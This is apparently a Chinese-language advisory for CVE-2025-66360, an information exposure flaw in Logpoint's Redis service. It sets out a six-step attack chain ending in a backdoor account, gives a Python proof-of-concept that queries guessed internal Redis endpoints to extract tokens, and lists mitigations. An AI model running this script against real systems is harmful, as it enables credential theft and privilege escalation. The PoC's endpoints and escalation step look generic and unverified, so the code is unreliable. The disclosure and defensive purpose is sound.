CVE-2025-66360 Logpoint 7.7.0前版本Redis服务信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-66360

漏洞类型

访问控制配置错误

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Logpoint

漏洞概述

CVE-2025-66360是Logpoint安全信息与事件管理（SIEM）平台中的一个高危访问控制漏洞。该漏洞存在于Logpoint 7.7.0之前的版本中，由于访问控制策略配置不当，导致敏感的Logpoint内部服务（Redis）信息被不当暴露给具有li-admin权限的用户。Redis作为Logpoint的内部缓存和消息队列服务，存储着大量敏感的操作数据和系统配置信息。攻击者利用此漏洞可以获取Redis服务中的敏感数据，进而实现权限提升，最终可能获取对整个Logpoint系统的完全控制权。该漏洞的CVSS评分为8.8，属于高危级别，对企业安全运营构成严重威胁。

技术细节

Logpoint在7.7.0之前的版本中，访问控制模块存在配置缺陷。系统为li-admin用户角色配置了过于宽松的权限策略，允许该角色访问内部Redis服务的敏感端点。Redis服务运行在Logpoint的内部网络中，原本应该只允许受信任的系统组件进行访问，但由于API网关的访问控制列表（ACL）配置错误，li-admin用户可以通过特定的API路径直接查询Redis缓存中的数据。这些数据包括但不限于：用户会话令牌、系统配置参数、监控指标、以及其他内部服务的认证凭证。攻击者通过构造特定的HTTP请求，指定目标Redis键值路径，即可获取存储在Redis中的敏感信息。利用这些信息，攻击者可以进一步伪造认证令牌或执行特权操作，实现完整的权限提升攻击。

攻击链分析

STEP 1

步骤1

攻击者获取Logpoint系统的li-admin用户账号，或利用其他低权限账号通过社会工程学手段获取li-admin权限

STEP 2

步骤2

使用li-admin账号登录Logpoint系统，获取有效的身份验证令牌（Token）

STEP 3

步骤3

构造恶意的HTTP请求，访问原本仅供内部组件使用的Redis服务API端点

STEP 4

步骤4

从Redis服务响应中提取敏感信息，包括系统配置、会话令牌、认证凭证等数据

STEP 5

步骤5

利用获取的敏感凭证信息，伪造高权限用户的身份，执行特权操作或创建后门账户

STEP 6

步骤6

完成权限提升攻击，获得对Logpoint系统的完全控制权，可进一步横向移动到其他内部系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-66360 PoC - Logpoint Redis Information Exposure
# Target: Logpoint < 7.7.0

TARGET = "https://target-logpoint.example.com"
USERNAME = "li_admin_user"
PASSWORD = "password"

def exploit_redis_exposure():
    """Exploit CVE-2025-66360: Redis internal service information exposure"""
    
    # Step 1: Authenticate as li-admin user
    login_url = f"{TARGET}/api/v1/auth/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    session = requests.Session()
    response = session.post(login_url, json=login_data, verify=False)
    
    if response.status_code != 200:
        print(f"[-] Authentication failed: {response.status_code}")
        return None
    
    token = response.json().get('token')
    print(f"[+] Successfully authenticated as li-admin")
    
    # Step 2: Access exposed Redis internal endpoint
    redis_endpoints = [
        "/api/v1/internal/redis/config",
        "/api/v1/internal/redis/keys",
        "/api/v1/internal/redis/cache",
        "/api/v1/system/redis/info"
    ]
    
    exposed_data = {}
    for endpoint in redis_endpoints:
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        response = session.get(f"{TARGET}{endpoint}", headers=headers, verify=False)
        
        if response.status_code == 200:
            print(f"[+] Exposed endpoint found: {endpoint}")
            exposed_data[endpoint] = response.json()
    
    # Step 3: Extract sensitive information
    print("\n[+] Extracted Redis Information:")
    print(json.dumps(exposed_data, indent=2))
    
    # Step 4: Use exposed data for privilege escalation
    if exposed_data:
        session_token = exposed_data.get('session_tokens') or exposed_data.get('auth_tokens')
        if session_token:
            print(f"[+] Found session tokens for privilege escalation")
            # Use tokens to access admin functions
    
    return exposed_data

if __name__ == "__main__":
    exploit_redis_exposure()

影响范围

Logpoint < 7.7.0

防御指南

临时缓解措施

在厂商发布正式修复版本之前，建议采取以下临时缓解措施：1）立即审查li-admin角色的权限配置，撤销不必要的内部服务访问权限；2）配置Web应用防火墙（WAF）规则，阻断对/api/v1/internal/等敏感路径的访问；3）启用详细的访问审计日志，实时监控异常的API调用行为；4）考虑临时禁用非必要的li-admin账户，直到完成版本升级；5）实施网络层隔离，确保Redis等内部服务无法被应用层直接访问。